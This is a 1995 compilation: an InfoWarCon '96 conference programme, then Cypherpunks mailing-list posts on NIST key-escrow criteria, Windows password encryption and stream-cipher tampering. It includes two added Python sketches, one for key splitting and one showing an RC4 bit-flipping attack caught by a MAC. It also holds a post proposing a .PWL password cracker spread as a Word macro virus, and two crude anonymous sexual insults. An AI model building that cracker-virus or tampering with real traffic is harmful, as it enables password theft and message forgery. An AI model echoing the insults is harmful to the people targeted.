P L E A S E  D I S T R I B U T E  W I D E L Y 

             InfoWarCon (Europe) '96
        Defining the European Perspective
               Brussels, Belgium
                 May 23-24 1996 


Sponsored by:

  National Computer Security Association
  Winn Schwartau, President and CEO, Interpact, Inc.
  Robert David Steele, Chairman & CEO, OPEN SOURCE SOLUTIONS 


Information Warfare represents a global challenge that faces all 
late-industrial and information age nation states.  It also represents 
the easiest and cheapest way for less developed nation-states and 
religious or political movements to anonymously and grievously attack 
major nations and international corporations.

Not only are the definitions of InfoWar unclear, but they span many 
areas and disciplines. This conference will examine the European 
perspectives on all three classes of Information Warfare while 
contributing some American lessons learned, mistakes made and successes 
enjoyed.

	Class I: Personal Privacy
	Class II: Industrial and Economic Spying and Warfare
	Class III: Global Conflict, Terrorism and the Military

As at all other InfoWarCon, this special European Conference encourages 
active audience participation, contribution and debate. 


May 22, 1996

17:00 - 20:00	Pre-Registration						
	
18:00 - 21:00	Hosted Cocktail Party with Music

		Most conference speakers will be in attendance.  Meet
		Mr. Schwartau and Mr. Steele. 

May 23, 1995

07:00 - 08:30	Registration							

07:00 - 08:30	Sponsored Continental Breakfast				

PLENARY SESSIONS

08:30 - 09:00	Keynote Speech							

		Major General William Robbins
			Assistant Chief Of Staff, Command, Control, 
			Communications, Computing, and Information
			Ministry of Defence, United Kingdom (Invited) 

	
09:00 - 10:00	"Information Warfare: Chaos on the Electronic Superhighway"	

		Winn Schwartau
			President and CEO, Interpact, Inc., USA
	
		An overview of Information Warfare from the civilian 
		perspective by one of the world's leading experts on the 
		subject. This will be an eye-opening presentation with 
		time reserved for questions from the audience.  
		Mr. Schwartau will be available throughout the conference 
		for personal and private discussions as well as book 
		signings.

10:00 - 11:15	Military View of Information Warfare				

		Moderator:
			Captain Patrick Tyrell
			  Assistant Director, Information Warfare Policy, 
				Ministry of Defence, United Kingdom
		Panel:
			The German View 
			The Russian View 
			The Croatian View 

11:15 - 11:45	Sponsored Break							

11:45 - 13:00	Law Enforcement in Cyberspace: 
			Cooperation is the Key: Panel	

		Moderator:
			Winn Schwartau, Interpact, Inc.
		Panel:
			Interpol 
			Surite 
			FBI 
			Netherlands 

		How will global partners respect each other's laws and 
		cooperate in their enforcement? Will extradition for 
		cyber-crimes become necessary? Leading experts will walk 
		us down the paths to success and offer lessons learned on 
		failures and risks.

13:00 - 14:30	Lunch 								
	
13:30 - 14:00	Special Luncheon Presentation 

BREAKOUT SESSIONS

14:30 - 16:00

Breakout I:	Threats to European Civil Prosperity

		Moderator:
			Admiral Lacoste/General Heinrich, France (Invited)
		Panel:
			Belgium
			Germany 
			United Kingdom 

		Europe is becoming as dependent upon its econo-technical 
		infrastructure more than ever with the design and 
		construction of the European Space Initiative. 
		Communications systems create the basis for global 
		commerce, transportation systems permit the distribution 
		of goods, the financial infrastructure is a requisite 
		component of any information based economy and the power 
		grid glues it all together. But, the threats to their 
		stability and integrity are many and must be dealt with 
		on a continent that has a history of war and more recently 
		terrorism. What are the risks? The rewards? 
		And the solutions?

Breakout II:	Information Warfare: Support for Conventional War Fighting

		Moderator: TBD 
		Panel:
			US - Gen. Jim McCarthy USAF (Ret)
			Russia
			Netherlands

		Conventional Wars and regional conflicts are replacing the 
		fear of East-West conflict. Advanced Industrial and 
		Information Age societies will supplement their armed 
		forces with enhanced information processing capabilities. 
		What are they and will they change the face of war?

16:00-16:30	Sponsored Break							

PLENARY SESSION

16:30 - 18:00	"Hackers: National Resources or Merely Cyber-Criminals?"

		Moderator:
			Mich Kabay, Ph.D.
			Director of Education, NCSA and 
			Robert Steele, President, OSS, Inc.

		Panel:
			Hactic and The Digital City Experiment: 
				Amsterdam, Netherlands (Invited)
			Hacker, United Kingdom 
			CHAOS Computer Club, Germany 

		Are hackers merely criminals operating under the guise of 
		Internet freedom? Or are they national resources to be 
		cultivated and who have served as an early warning system 
		for Cyberspace? One group of American hackers have 
		threatened to "Declare War on France" on behalf of American 
		interests. How do we as nations deal with this?

		Mich Kabay and Robert Steele will debate the issue and then 
		you will meet the hackers in person. The first Information 
		Warriors invite your questions, comments and interaction. 
		Learn first hand who they are, what they believe and how 
		they function. 

18:00 - 21:00	Hosted Reception						

21:00 - 23:00	"Dutch Dinners" for Birds of a Feather				
			Rallying points will be provided.

May 24, 1996

07:00 - 8:30	Sponsored Continental Breakfast 				

08:30 - 9:00	Keynote Speech							

		"Efforts to Maximize Information As New Age Weapon" (TBD)

PLENARY SESSIONS

9:00 - 10:00	"Creating Smart Nations Through National Information 
		Strategies: Intelligence And Security Issues"	

		Robert David Steele, President, OSS, Inc. US

		Planning for the future requires new thinking and a new 
		"triad" of defense: Open Source Intelligence, Electronic 
		Home Defense and Information Warfare. 21st Century realities 
		invite dozens more players who must be monitored and 
		controlled. Governments and the military should avail 
		themselves of the publicly available open source 
		information as part of their ongoing intelligence 
		operations. Mr. Steele has suggested that nations should 
		"draft" the civil sector by requiring 'due diligence' and 
		very high standards of private sector communications and 
		computing security.

10:00 - 11:15 	"The Convergence of Military and Commercial Vulnerabilities" 	

		Moderator:
			Winn Schwartau, President and CEO, Interpact, Inc.
		Panel:
			Bob Ayers, DISA, Department of Defense, US
			Holland / Belgium 
			UK
			France 

		Much of military success depends upon the reliable operation 
		of civilian and commercial systems. No longer do the 
		government and military and private sector function in 
		isolation. What levels of cooperation are required to 
		assure proper defense and war fighting capability? How much 
		of the private sector must be viewed as a national security 
		asset - to be protected as much as is a forward deployed 
		military unit?

11:15 - 11:45	Sponsored Break							

11:45 - 13:00	Societal Impact of Information Warfare 				

		Moderator:
			Winn Schwartau, President and CEO, Interpact, Inc.

		Society is absolutely dependent upon technology; without 
		networks and computers and communications, portions of 
		society can collapse within days. If major systems fail, 
		what will the reaction of a techno-reliant society be? 
		And, what are the ethics of a military who instigates the 
		collapse of an adversary's civilian infrastructure rather 
		than resort to bombs and bullets? Is a techno-phobic 
		society psychologically prepared for the consequences?

13:00 - 14:30	Lunch 								

13:30-14:00	Special Luncheon Presentation 

BREAKOUT SESSIONS

14:30 - 16:00

Breakout I:	Legislation & Personal Privacy: 
			A Global Electronic Bill of Rights?

		Moderator:
			General Pickering, Canada (Invited) 
		Panel:
			Electronic Privacy International (Invited)
			Sweden 
			The Vatican 

		This panel will examine the different approaches governments 
		take to protect the personal privacy of their citizens and 
		what steps need to be taken to create a global consensus. 
		How do differing privacy laws affect countries' ability to do 
		business? How will authoritarian regimes counter the 
		perceived threat of free and open information flow?

Breakout II:	"Industrial Espionage: An Update"

		Moderator:
			DST, France (Invited)  - (RS)
		Panel:
			Surite tells all 
			Kroll Associates US 
			Germany

		122 Countries are actively engaged in industrial and 
		economic espionage to the benefit of their respective 
		states.  It's a lot easier for a third world or agrarian 
		society to steal intellectual and proprietary property than 
		to invest time and resources to develop their own. Who's 
		involved and what are they doing? What steps need to be 
		taken to defend such actions? 

16:00 - 16:30	Sponsored Break							

PLENARY

16:30 - 18:00	Defining War in the Information Age
			"The New National Security"

		Brief comments by Winn Schwartau and Robert Steele - 
		and then a lively interactive audience debate.

		An enemy bomb landing in any country can be easily 
		construed as an act of war.  However, in Cyberspace, 
		anonymous acts of aggression that lead to war or replace 
		conventional attacks are not so simple to classify.

		This highly charged subject will consider what war is 
		and what it isn't: 

		- Is an attack against a financial institution an act of war?
		- What about the intentional collapse of a communications 
			infrastructure?
		- Is human lethality a necessary pre-requisite for war?
		- Do we need to redefine national security for the post 
			Cold-War world?

18:00 - 18:10 	Closing Comments

18:00 - 20:00	No-Host Reception						



Hotel Information:

	Hotel Palace
	rue Gineste 3
	1210 Brussels
	Belgium

	+32 2 203 62 00
	+32 2 203 55 55 (Fax)

    InfoWarCon (Europe) - 96 Registration Form:

     Name:    ___________________________________________________________

     Title:   ___________________________________________________________
     
     Org:     ___________________________________________________________

     Address: ___________________________________________________________

     Address: ___________________________________________________________

     City:    ___________________________________________________________

     State:   _______________________________  Zip: _____________________

     Country: __________________________  Email: ________________________

     Phone:   __________________________  Fax:  _________________________


FEES:

        Payment made BEFORE March 1, 1996:    

                (   )  $845.00     NCSA Members/OSS Attendees
                (   )  $895.00     All others
                (   )  $795.00     3 people from same organization
                (   )  $745.00     5 or more people from same organization

        Payment made AFTER March 1, 1996:

                (   )  $895.00     NCSA Members/Paid OSS Attendees
                (   )  $995.00     All others
                (   )  $845.00     3 people from same organization
                (   )  $795.00     5 or more people from same organization

  Make checks payable to NCSA, or

     Charge to:  (  ) VISA      (  )   MasterCard       AMEX (  )

       Number:     ___________________________________________

       Exp date:   ___________________________

       Signature:  ___________________________________________


MAIL OR FAX OR EMAIL REGISTRATION TO:  

	National Computer Security Association
	10 South Courthouse Avenue
	Carlisle, PA 17013
	Phone 717-258-1816 or FAX 717-243-8642
	EMAIL:		conference@ncsa.com

To obtain the latest edition of this program, send EMail to:

	euroinfowar@ncsa.com

For more information about NCSA:

	WWW:	http://www.ncsa.com
	CompuServe:	GO NCSA
	EMail:		info@ncsa.com

Sponsorships for various InfoWarCon (Europe) 96 events are still available. To 
find out how to sponsor portions:

	Contact Paul Gates at the NCSA: pgates@ncsa.com

To reach: 	Winn Schwartau:  Winn@Infowar.Com
		Robert Steele: ceo@oss.net

V 1.1/12.7.95

Peace & Happy Holidays
Winn

		        Winn Schwartau - Interpact, Inc.
		        Information Warfare and InfoSec
		       V: 813.393.6600 / F: 813.393.6361
			    Winn@InfoWar.Com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 8 Dec 95 08:23:34 PST
To: cypherpunks@toad.com
Subject: Key Escrow Agent Criteria  [Draft]
Message-ID: <199512081619.RAA26774@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



[From NIST 12-08-95]


The following draft discussion paper was distributed at the
12/5/95 meeting at NIST on draft criteria for 64-bit software
key escrow exportability.


                              DRAFT
                            (12/1/95)

                    Key Escrow Agent Criteria


Introduction


An often heard concern regarding key escrow encryption is that
users of such encryption are vulnerable to abuse of the escrowed
key by the escrow agents or others.  Many have suggested that
changes in the law are needed that specifically criminalize any
such abuses.  We agree that such laws will be beneficial in
deterring acts by anyone to access escrowed keys without
authority or to undermine the integrity of the escrow key system.


However, the availability of criminal prosecution is not alone
sufficient.  Key escrow agents must be selected not only with a
view toward assuring the availability of escrowed keys for
properly authorized government officials, but also to assure that
the escrow agents have the commitment and means to protect the
confidentiality and integrity of the keys they escrow and the
escrow system.  This will be particularly important if, as we
expect will occur, some key escrow products will be designed such
that the escrow agent could discern the identity of the user from
the keys and other information that is escrowed with them.


The following criteria were drafted with these principles in
mind.  We have not yet addressed conditions under which users can
be the sole repository of the keys for their system.  We
recognize that some organizations or people do not want anybody
but themselves to escrow their keys.  However, since an important
reason for escrowing is to preserve effective law enforcement, we
must assure authorized officials can reliably and timely obtain
access to escrowed keys through entities independent of the
subject of electronic surveillance.  Thus we welcome suggestions
on how best to meet this range of interests.


In considering the criteria appropriate for approving escrow
agents, we considered whether the government needs to assure it
has timely and reliable access when authorized and what key
escrow encryption users would want to ensure that the escrowing
of keys does not undermine their security.  Of course, the
government is also a user of key escrow encryption products and
shares with other users an interest to ensure the integrity and
security of the escrow system.  Similarly, organizations
interested in data recovery share the government's interest to
have a system through which access to escrowed key is enabled
under appropriate circumstances.  With these considerations in
mind, we developed criteria in two categories, "Escrow System
Integrity and Security" and "Key Access Requirements."  We expect
that prospective escrow agents that meet criteria such as these
would be considered as "approved" escrow agents for export
purposes, to hold keys for government systems, etc.


Note that keys and/or key components for devices that may process
classified information shall be escrowed with escrow agent
entities selected by the U.S. government, and that those escrow
agent entities may be required to meet more stringent
requirements.


Escrow System Integrity and Security


1.   Escrow agent entities shall devise and institutionalize
     policies, procedures, and mechanisms to ensure the
     confidentiality, integrity, and availability of key escrow
     related information.


     a.   Escrow agent entities shall be designed and operated so
          that a failure by a single person, procedure, or
          mechanism does not compromise the confidentiality,
          integrity or availability of the key and/or key
          components (e.g., two person control of keys, split
          keys, etc.)


     b.   Unencrypted escrowed key and/or key components that are
          stored and/or transmitted electronically shall be
          protected (e.g., via encryption) using approved means.


     c.   Unencrypted escrowed key and/or key components stored
          and/or transferred via other media/methods shall be
          protected using approved means (e.g., safes).


2.   Escrow agent entities shall ensure due form of escrowed key
     access requests and authenticate the requests for escrowed
     key and/or key components.


3.   Escrow agent entities shall protect against disclosure of
     information regarding the identity of the person/
     organization whose key and/or key components is requested,
     and the fact that a key and/or key component was requested
     or provided.


4.   Escrow agent entities shall enter keys/key components into
     the escrowed key database immediately upon receipt.


5.   Escrow agent entities shall ensure at least two copies of
     any key and/or key component in independent locations to
     help ensure the availability of such key and/or key
     components due to unforeseen circumstances.


6.   Escrow agent entities that are certified by the U.S.
     government shall work with developers of key escrow
     encryption products and support a feature that allows
     products to verify to one another that the products' keys
     have been escrowed with a U.S.-certified agent.


Key Access Requirements


7.   An escrow agent entity shall employ one or more persons who
     possess a SECRET clearance for purposes of processing
     classified (e.g., FISA) requests to obtain keys and/or key
     components.


8.   Escrow agent entities shall protect against unauthorized
     disclosure of information regarding the identity of the
     organization requesting the key or key components.


9.   Escrow agent entities shall maintain data regarding all key
     escrow requests received, key escrow components released,
     database changes, system administration accesses, and dates
     of such events, for purposes of audit by appropriate
     government officials or others.


10.  Escrow agent entities shall maintain escrowed keys and/or
     key components for as long as such keys may be required to
     decrypt information relevant to a law enforcement
     investigation.


11.  Escrow agent entities shall provide key/key components to
     authenticated requests in a timely fashion and shall
     maintain a capability to respond more rapidly to emergency
     requirements for access.


12.  Escrow agent entities shall possess and maintain a
     Certificate of Good Standing from the State of incorporation
     (or similar local/national authority).


13.  Escrow agent entities shall provide to the U.S. government a
     Dun & Bradstreet/TRW number or similar credit report pointer
     and authorization.


14.  Escrow agent entities shall possess and maintain an Errors &
     Omissions insurance policy.


15.  Escrow agent entities shall provide to the U.S. government a
     written copy of, or a certification of the existence of a
     corporate security policy governing the key escrow agent
     entity's operation.


16.  Escrow agent entities shall provide to the U.S. government a
     certification that the escrow agent will comply with all
     applicable federal, state, and local laws concerning the
     provisions of escrow agent entity services.


17.  Escrow agent entities shall provide to the U.S. government a
     certification that the escrow agent entity will transfer to
     another approved escrow agent the escrow agent entity's
     equipment and data in the event of any dissolution or other
     cessation of escrow agent entity operations.


18.  Escrow agent entities for products sold in the U.S. shall
     not be a foreign country or entity thereof, a national of a
     foreign country, or a corporation of which an alien is an
     officer or more than one-fourth of the stock which is owned
     by aliens or which is directly or indirectly controlled by
     such a corporation.  Foreign escrow agent entities for
     products exported from the U.S. will be approved on a case
     by case basis as law enforcement and national security
     agreements can be negotiated.


19.  Escrow agent entities shall provide to the U.S. government a
     certification that the escrow agent entity will notify the
     U.S. government in writing of any changes in the foregoing
     information.


20.  Fulfillment of these and the other criteria are subject to
     periodic recertification.


12/1/95

*****************************************************  

Elaine Frye
Computer Security Division
National Institute of Standards and Technology
Bldg. 820, M.S. Room 426
Gaithersburg, MD  20899-0001
Voice:   301/975-2819    Fax:  301/948-1233

*****************************************************
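
Criteria 1a and 5 of the draft above, sketched as an added example that is not part of the NIST paper: a key is split into XOR components so that no single custodian holds it, and every component is kept at two sites so that one site failure does not lose it. The site names, the 64-bit sample key, and the SHA-256 key check value are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets
from itertools import product


def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def split_key(key, custodians):
    """n-of-n XOR split: all components are needed, any subset is random noise."""
    if custodians < 2:
        raise ValueError("splitting needs at least two custodians")
    parts = [secrets.token_bytes(len(key)) for _ in range(custodians - 1)]
    last = key
    for part in parts:
        last = xor_bytes(last, part)
    return parts + [last]


def combine(components):
    key = components[0]
    for part in components[1:]:
        key = xor_bytes(key, part)
    return key


def check_value(key):
    """Short digest stored with the escrow record to detect a bad recombination."""
    return hashlib.sha256(b"escrow-kcv" + key).digest()[:8]


def deposit(key, sites=("site-a", "site-b"), custodians=2):
    """Store component i for custodian i at every site (hypothetical site names)."""
    components = split_key(key, custodians)
    vault = {site: dict(enumerate(components)) for site in sites}
    return vault, check_value(key)


def recover(vault, custodians, kcv, offline=()):
    """Rebuild the key from whatever copies are reachable.

    Raises LookupError if some component is missing everywhere, and
    ValueError if no combination of reachable copies matches the check value.
    """
    copies = []
    for idx in range(custodians):
        found = [vault[s][idx] for s in vault
                 if s not in offline and idx in vault[s]]
        if not found:
            raise LookupError(f"component {idx} unavailable at every reachable site")
        copies.append(found)
    # Try each combination of copies so one corrupted copy does not block recovery.
    for combo in product(*copies):
        key = combine(combo)
        if hmac.compare_digest(check_value(key), kcv):
            return key
    raise ValueError("no combination of components matches the check value")


if __name__ == "__main__":
    sample_key = bytes.fromhex("0123456789abcdef")   # constructed 64-bit key
    vault, kcv = deposit(sample_key)
    print(recover(vault, 2, kcv, offline=("site-a",)).hex())
```

The split protects confidentiality only while the custodians stay independent; the two-site copy protects availability only while at least one copy of every component survives.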






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Fri, 8 Dec 95 15:16:43 PST
To: Laszlo Vecsey <master@internexus.net>
Subject: Re: CP: Mailing List Subjects
In-Reply-To: <Pine.LNX.3.91.951208171531.16447B-100000@micro.internexus.net>
Message-ID: <Pine.ULT.3.91.951208171853.19620A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 8 Dec 1995, Laszlo Vecsey wrote:

> Would it be possible for the Cypherpunks mailing list remailer to parse the 
> Subject line to include a CP: at the beginning, or some notation so that 
> Cypherpunk messages can be easily 'filtered' out from my Inbox?

I sort mine using the "sender:" tag.  Works like a charm.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMMir1TokqlyVGmCFAQGcngQAwbu8k2KPb21zxoNIoMwrcByaSGpl1pk1
JxdSaTq+JYWgIzJEVYbnP41ftV08XyPcovQdQe+2GF/pjVBFlV4ZE/QmVx5JtoWr
gu8otJkGvN1MLLJA1isSBqkFr5HCLtcRJXRv5Xl0qLz7narhbbwfoxYUHTX3obC9
wN/u4wxPKpE=
=k1z1
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GED/J d-- s:++>: a-- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+
K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++(+)>$ Y++ PGP++ t- 5+++ X++
R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y+**
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laszlo Vecsey <master@internexus.net>
Date: Fri, 8 Dec 95 14:18:35 PST
Subject: CP: Mailing List Subjects
In-Reply-To: <acedea6511021004dea8@[205.199.118.202]>
Message-ID: <Pine.LNX.3.91.951208171531.16447B-100000@micro.internexus.net>
MIME-Version: 1.0
Content-Type: text/plain


Would it be possible for the Cypherpunks mailing list remailer to parse the 
Subject line to include a CP: at the beginning, or some notation so that 
Cypherpunk messages can be easily 'filtered' out from my Inbox?

Also, about Microsoft's .PWL file format. Will they be releasing the 
new encryption method? Or are we not supposed to feel safe that our 
passwords are protected in Windows95.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nicholas Philp <lumisign@c031.aone.net.au>
Date: Thu, 7 Dec 95 23:26:38 PST
To: cypherpunks@toad.com
Subject: (no subject)
Message-ID: <199512080727.SAA19878@mail.mel.aone.net.au>
MIME-Version: 1.0
Content-Type: text/plain


WE WANT SOME PUSSY PICTURES







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Fri, 8 Dec 95 19:08:51 PST
To: "Rev. Mark Grant" <mark@unicorn.com>
Subject: Re: Still more on the Digicash protocol
Message-ID: <9512082354.AA02244@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


David A Wagner writes:
> >Tough!?  It's trivial for an active attacker, in the stream cipher case.
> >He just xors some bits: no clever cryptanalysis needed.  (Or did you mean
> >it's tough to mount an active attack?  I agree: that requires significant
> >knowledge or motivation.)
Rev. Mark Grant responds:
>  Exactly.. once you have an active attack set up, it's trivial, but
>  setting that up is quite hard.

But setting up an active attack is probably a hell of a lot easier than  
breaking 128-bit RC-4 (or even 64-bit).

andrew
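
The bit-flipping that David Wagner describes in the quoted text, shown as an added example that is not part of the original thread: a stream-cipher ciphertext can be altered in transit without the key, and a MAC over the ciphertext is what lets the receiver detect it. The keys, the message format, and the encrypt-then-MAC construction with HMAC-SHA256 are assumptions chosen for illustration.

```python
import hashlib
import hmac

# Constructed sample values (not from the thread).
ENC_KEY = bytes(range(16))        # 128-bit RC4 key
MAC_KEY = bytes(range(16, 48))    # independent MAC key
MESSAGE = b"PAY 0000100 TO merchant-17"
TAG_LEN = hashlib.sha256().digest_size


def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def rc4_keystream(key, length):
    """Standard RC4: key scheduling, then `length` bytes of keystream."""
    state = list(range(256))
    j = 0
    for i in range(256):
        j = (j + state[i] + key[i % len(key)]) % 256
        state[i], state[j] = state[j], state[i]
    i = j = 0
    out = bytearray()
    for _ in range(length):
        i = (i + 1) % 256
        j = (j + state[i]) % 256
        state[i], state[j] = state[j], state[i]
        out.append(state[(state[i] + state[j]) % 256])
    return bytes(out)


def rc4(key, data):
    """Encrypt or decrypt: both are the same XOR with the keystream."""
    return xor_bytes(data, rc4_keystream(key, len(data)))


def modify_in_transit(ciphertext, offset, known, wanted):
    """Model of the active attack: XOR (known ^ wanted) into the ciphertext.

    No key is used, only knowledge of the plaintext format.
    """
    if len(known) != len(wanted):
        raise ValueError("replacement must keep the field length")
    altered = bytearray(ciphertext)
    for k, delta in enumerate(xor_bytes(known, wanted)):
        altered[offset + k] ^= delta
    return bytes(altered)


def seal(message):
    """Encrypt-then-MAC. A real system also needs a fresh key per message."""
    ciphertext = rc4(ENC_KEY, message)
    return ciphertext + hmac.new(MAC_KEY, ciphertext, hashlib.sha256).digest()


def unseal(blob):
    if len(blob) < TAG_LEN:
        raise ValueError("message too short to carry a MAC")
    ciphertext, tag = blob[:-TAG_LEN], blob[-TAG_LEN:]
    expected = hmac.new(MAC_KEY, ciphertext, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("MAC check failed: ciphertext was modified")
    return rc4(ENC_KEY, ciphertext)


def demo():
    # Without a MAC the receiver decrypts the altered amount and accepts it.
    bare = modify_in_transit(rc4(ENC_KEY, MESSAGE), 4, b"0000100", b"9999999")
    accepted = rc4(ENC_KEY, bare)
    # With a MAC over the ciphertext the same change is rejected.
    sealed = seal(MESSAGE)
    try:
        unseal(modify_in_transit(sealed, 4, b"0000100", b"9999999"))
        detected = False
    except ValueError:
        detected = True
    return accepted, unseal(sealed), detected


if __name__ == "__main__":
    print(demo())
```

Key length plays no part in the first result: the altered message decrypts cleanly under a 40-bit, 64-bit or 128-bit key alike, which is why integrity has to be checked separately from confidentiality.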




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Name Withheld by Request)
Date: Fri, 8 Dec 95 09:08:55 PST
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199512081710.SAA28344@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


> WE WANT SOME PUSSY PICTURES

Can't help you there but, I do have some pictures of your mother
having sex with a dog because she didn't want you to be an only child.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 8 Dec 95 19:25:22 PST
To: cypherpunks@toad.com
Subject: SpeakFree (Internet real-time voice w/encryption?)
Message-ID: <199512090325.TAA11218@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Has anybody seen, used or hacked with SpeakFree?

Supposedly it's a kind of internet-phone that has IDEA/DES encryption options, plus another option to exchange encryption keys with PGP...

The URL is http://www.fourmilab.ch/speakfree/windows/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Charles Graves <llurch@networking.stanford.edu>
Date: Fri, 8 Dec 95 19:50:37 PST
To: cypherpunks@toad.com
Subject: Windows .PWL cracker implemented as a Word Basic virus?
Message-ID: <199512090351.TAA29699@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Just an idea. It would be huge, but can anyone think of a reason it would not
be technically feasible?

Also, does NT use the same algorithm for saving network passwords?

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 9 Dec 95 20:45:16 PST
To: cypherpunks@toad.com
Subject: Re: Netscape announces position against GAK
Message-ID: <199512100446.UAA00146@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 04:27 AM 12/9/95 -0800, Timothy C. May wrote:
>Credit where credit is due.
>
>I for one am satisfied--and even pleased--with the Netscape position on GAK.

Well, I for one am seriously unsatisfied, but it is not so bad as
to merit a campaign against Netscape.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 8 Dec 95 22:15:44 PST
To: cypherpunks@toad.com
Subject: NT v. Win95 Passwords (was Re: Windows .PWL cracker implemented as a Word Basic virus)
In-Reply-To: <199512090547.FAA21624@pop01.ny.us.ibm.net>
Message-ID: <Pine.ULT.3.91.951208220127.28627P@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 9 Dec 1995, Dan Bailey wrote:

> On Fri, 8 Dec 1995 19:51:55 -0800 you wrote:
> 
> >
> >Also, does NT use the same algorithm for saving network passwords?
> >
> No, but they're doing something that makes me very uncomfortable:  As
> I read this, they're hashing the password and some other user
> information using MD4 then doing some proprietary permutations on
> that.  Given their record with security, I'd rather they used straight
> MD4, rather than throwing in something that we can't analyze.
> 						Dan Bailey
> 
> From the Microsoft Knowledge Base article Q102716

That would be http://www.microsoft.com/kb/bussys/winnt/q102716.htm. Seems
reasonable to me. It's good enough for NT to get the guvment's imprimatur
for the guvment's own use. 

Does anyone have any technical information on the problem referred to in
http://www.microsoft.com/KB/PEROPSYS/windows/Q131675.htm (below)? It says 
"The password encryption method used by Windows NT is different from
the method used by Windows 95," and offers some curious workarounds.
Microsoft has not been very cooperative. 

In other news (just to combine four subjects in one message), in our
meeting with Microsoft today on DHCP issues (that's in the gopher archive;
finger me), a Highly Placed Source said that Microsoft would release the
details on the new Win95 .PWL encryption Soon, and that a release
candidate is in internal beta testing now, but that there would be no
outside testing prior to the public release. 

Q131675

SYMPTOMS

You may not be able to connect to a shared folder on a Windows 95 computer
from a Microsoft Windows NT workstation.


CAUSE

The password encryption method used by Windows NT is different from
the method used by Windows 95.


RESOLUTION

You may be able to work around this problem by using one of the following
methods:

 - Use all uppercase or all lowercase characters in the Windows 95
   shared folder password.

 - Remove password protection from the shared folder.

 - Use user-level access control instead of share-level access control.


STATUS

Microsoft is researching this problem and will post new information
here in the Microsoft Knowledge Base as it becomes available.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 8 Dec 95 22:43:21 PST
To: cypherpunks@toad.com
Subject: Re: CP: Mailing List Subjects
Message-ID: <199512090643.WAA26800@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 8 Dec 1995, Michael Handler wrote:

> Learn procmail. It'll save you hours upon hours of time.
>
> :0:
> * (^From owner-cypherpunks@toad\.com|^Sender: owner-cypherpunks@toad\.com)
> lists/cypherpunks

Would the following work??

 :0
 * (^From|^Sender).*owner-cypherpunks@toad.com
 |/usr/bin/contrib/procmail -m ~/.punk_rc 

Does anyone know where the procmail archives are??  

That might help some of us out, especially those of us who are lousy at
managing our very, very precious resources. 



Alice de 'nonymous ...               <an455120@anon.penet.fi>


                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Fri, 8 Dec 95 22:50:54 PST
To: <cypherpunks@toad.com>
Subject: [FYI] Corp.Spooks Outed + W3 Proxy Filters
Message-ID: <v03004002aceedf15cdfc@[129.46.82.86]>
MIME-Version: 1.0
Content-Type: text/plain


PRIVACY INTERNATIONAL's BIG BROTHER INCORPORATED. A Report on the Int'l
Trade in Surveillance Technology and its Links to the Arms Industry.
<http://www.privacy.org/pi/reports/big_bro/>

"WebFilter" (formerly "NoShit")
<http://emile.math.ucsb.edu:8000/~boldt/NoShit/index.html>
<http://pubs.iworld.com/ww-online/Nov95/news/noshit.html>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Fri, 8 Dec 95 19:53:48 PST
To: Laszlo Vecsey <master@internexus.net>
Subject: Re: CP: Mailing List Subjects
In-Reply-To: <Pine.LNX.3.91.951208171531.16447B-100000@micro.internexus.net>
